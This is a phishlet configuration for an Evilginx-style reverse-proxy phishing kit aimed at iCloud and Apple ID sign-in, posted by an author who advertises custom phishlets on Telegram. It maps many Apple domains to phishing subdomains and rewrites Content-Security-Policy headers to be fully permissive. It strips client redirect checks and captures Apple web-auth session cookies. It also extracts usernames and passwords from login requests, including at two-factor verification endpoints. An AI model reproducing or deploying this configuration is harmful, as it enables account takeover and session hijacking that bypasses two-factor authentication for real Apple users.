# PLEASE DO NOT MISUSE THIS PHISHLET.
# For help, or other custom phishlets contact me on telegram: https://t.me/blackdatabase
name: 'icloud'
author: '@blackdatabase'
min_ver: '3.0.0'
proxy_hosts:
  - { phish_sub: "", orig_sub: "", domain: "icloud.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "www", orig_sub: "www", domain: "icloud.com", session: true, is_landing: true, auto_filter: false }
  - { phish_sub: "setup", orig_sub: "setup", domain: "icloud.com", session: true, is_landing: false, auto_filter: false }
  # - { phish_sub: "cn", orig_sub: "", domain: "icloud.com.cn", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "feedbackws", orig_sub: "feedbackws", domain: "icloud.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "beta", orig_sub: "beta", domain: "icloud.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "developer", orig_sub: "developer", domain: "icloud.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "webc", orig_sub: "webcourier.push", domain: "apple.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "cdn", orig_sub: "cdn", domain: "apple-cloudkit.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "api", orig_sub: "api", domain: "apple-cloudkit.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "fs", orig_sub: "feedbackws", domain: "apple-cloudkit.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "appleid-cdn-apple", orig_sub: "appleid", domain: "cdn-apple.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "www", orig_sub: "www", domain: "apple.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "idmsa", orig_sub: "idmsa", domain: "apple.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "appleid-apple", orig_sub: "appleid", domain: "apple.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "support", orig_sub: "support", domain: "apple.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "iforgot", orig_sub: "iforgot", domain: "apple.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "signin", orig_sub: "signin", domain: "apple.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "id", orig_sub: "id", domain: "apple.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "gsa", orig_sub: "gsa", domain: "apple.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "dev", orig_sub: "icloud.developer", domain: "apple.com", session: false, is_landing: false, auto_filter: false }
  - { phish_sub: "fws", orig_sub: "familyws.icloud", domain: "apple.com", session: false, is_landing: false, auto_filter: false }
  # - { phish_sub: "idmsa", orig_sub: "idmsa", domain: "apple.cn", session: false, is_landing: false, auto_filter: false }
  # - { phish_sub: "idmsa", orig_sub: "idmsa", domain: "apple.com.cn", session: false, is_landing: false, auto_filter: false }

sub_filters:
  - { triggers_on: "icloud.developer.apple.com", orig_sub: "", domain: "", search: '<meta http-equiv="Content-Security-Policy" content="(.*?)"', replace: '<meta http-equiv="Content-Security-Policy" content="default-src *  data: blob: filesystem: about: ws: wss: ''unsafe-inline'' ''unsafe-eval''; script-src * data: blob: ''unsafe-inline'' ''unsafe-eval''; connect-src * data: blob: ''unsafe-inline''; img-src * data: blob: ''unsafe-inline''; frame-src * data: blob: ; style-src * data: blob: ''unsafe-inline''; font-src * data: blob: ''unsafe-inline'';"', mimes: ["text/html"], }
  - { triggers_on: "www.icloud.com", orig_sub: "", domain: "", search: '<meta http-equiv="Content-Security-Policy" content="(.*?)"', replace: '<meta http-equiv="Content-Security-Policy" content="default-src *  data: blob: filesystem: about: ws: wss: ''unsafe-inline'' ''unsafe-eval''; script-src * data: blob: ''unsafe-inline'' ''unsafe-eval''; connect-src * data: blob: ''unsafe-inline''; img-src * data: blob: ''unsafe-inline''; frame-src * data: blob: ; style-src * data: blob: ''unsafe-inline''; font-src * data: blob: ''unsafe-inline'';"',  mimes: ["text/html"], }
  - { triggers_on: "www.icloud.com", orig_sub: "feedbackws", domain: "icloud.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "www", domain: "icloud.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "", domain: "apple-cloudkit.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "appleid.apple.com", orig_sub: "appleid", domain: "cdn-apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "idmsa.apple.com", orig_sub: "appleid", domain: "cdn-apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html"] }
  - { triggers_on: "appleid.apple.com", orig_sub: "", domain: "icloud.com", search: "{domain}", replace: "{domain}", mimes: ["text/html"] }
  - { triggers_on: "idmsa.apple.com", orig_sub: "", domain: "icloud.com", search: "{domain}", replace: "{domain}", mimes: ["text/html"] }
  # - { triggers_on: "appleid.apple.com", orig_sub: "", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "appleid.apple.com", orig_sub: "www", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "appleid.apple.com", orig_sub: "webcourier.push", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "appleid.apple.com", orig_sub: "idmsa", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "appleid.apple.com", orig_sub: "appleid", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  # - { triggers_on: "idmsa.apple.com", orig_sub: "", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "idmsa.apple.com", orig_sub: "www", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "idmsa.apple.com", orig_sub: "webcourier.push", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "idmsa.apple.com", orig_sub: "idmsa", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "idmsa.apple.com", orig_sub: "appleid", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "appleid", domain: "cdn-apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "", domain: "", search: 'setup.".*ws/1/"', replace: 'setup.{domain}/setup/ws/1/"', mimes: ["application/javascript", "text/javascript"] }
  # - { triggers_on: "setup.icloud.com", orig_sub: "", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "www", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "webcourier.push", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "idmsa", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "appleid", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "support", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "iforgot", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "signin", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "id", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "gsa", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "icloud.developer", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "familyws.icloud", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/json"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "", domain: "icloud.com", search: "{domain}", replace: "{domain}", mimes: ["application/json"] }
  - { triggers_on: "www.icloud.com", orig_sub: "", domain: "", search: '[A-z]&&\(window\.location\.href=[A-z]\)', replace: '', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "setup.icloud.com", orig_sub: "", domain: "", search: '[A-z]&&\(window\.location\.href=[A-z]\)', replace: '', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "appleid.apple.com", orig_sub: "", domain: "", search: '[A-z]&&\(window\.location\.href=[A-z]\)', replace: '', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "idmsa.apple.com", orig_sub: "", domain: "", search: '[A-z]&&\(window\.location\.href=[A-z]\)', replace: '', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "", domain: "icloud.com", search: "{domain}", replace: "{domain}", mimes: ["text/html","application/javascript", "text/javascript"] }
  # - { triggers_on: "www.icloud.com", orig_sub: "", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "www", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "webcourier.push", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "idmsa", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "appleid", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "support", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "iforgot", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "signin", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "id", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "gsa", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "icloud.developer", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "www.icloud.com", orig_sub: "familyws.icloud", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html","application/javascript", "text/javascript"] }
  - { triggers_on: "cdn.apple-cloudkit.com", orig_sub: "", domain: "icloud.com", search: "{domain}", replace: "{domain}", mimes: ["application/javascript"] }
  - { triggers_on: "cdn.apple-cloudkit.com", orig_sub: "feedbackws", domain: "apple-cloudkit.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/javascript"] }
  - { triggers_on: "cdn.apple-cloudkit.com", orig_sub: "cdn", domain: "apple-cloudkit.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/javascript"] }
  - { triggers_on: "cdn.apple-cloudkit.com", orig_sub: "api", domain: "apple-cloudkit.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/javascript"] }
  - { triggers_on: "appleid.cdn-apple.com", orig_sub: "appleid", domain: "cdn-apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/javascript"] }
  - { triggers_on: "appleid.cdn-apple.com", orig_sub: "www", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/javascript"] }
  - { triggers_on: "appleid.cdn-apple.com", orig_sub: "support", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/javascript"] }
  - { triggers_on: "appleid.cdn-apple.com", orig_sub: "appleid", domain: "apple.com", search: "{hostname}", replace: "{hostname}", mimes: ["application/javascript"] }

  - { triggers_on: "icloud.developer.apple.com", orig_sub: "", domain: "icloud.com", search: "{domain}", replace: "{domain}", mimes: ["text/html"] }
auth_tokens:
  - domain: ".icloud.com"
    keys: ["X-APPLE-WEBAUTH-TOKEN", "X-APPLE-WEBAUTH-USER", "X-APPLE-WEBAUTH-VALIDATE"]
credentials:
  username:
    key: ""
    search: '"accountName":"([^"]*)'
    type: "json"
  password:
    key: ""
    search: '"password":"([^"]*)'
    type: "json"
auth_urls:
  - "/setup/ws/1/accountLogin"
  - "/accountLogin"
  - "/appleauth/auth/verify/phone/securitycode"
  - "/appleauth/auth/2sv/donttrust"
  - "/appleauth/auth/2sv/trust"
  # - '/appleauth/auth'
login:
  domain: "www.icloud.com"
  path: "/"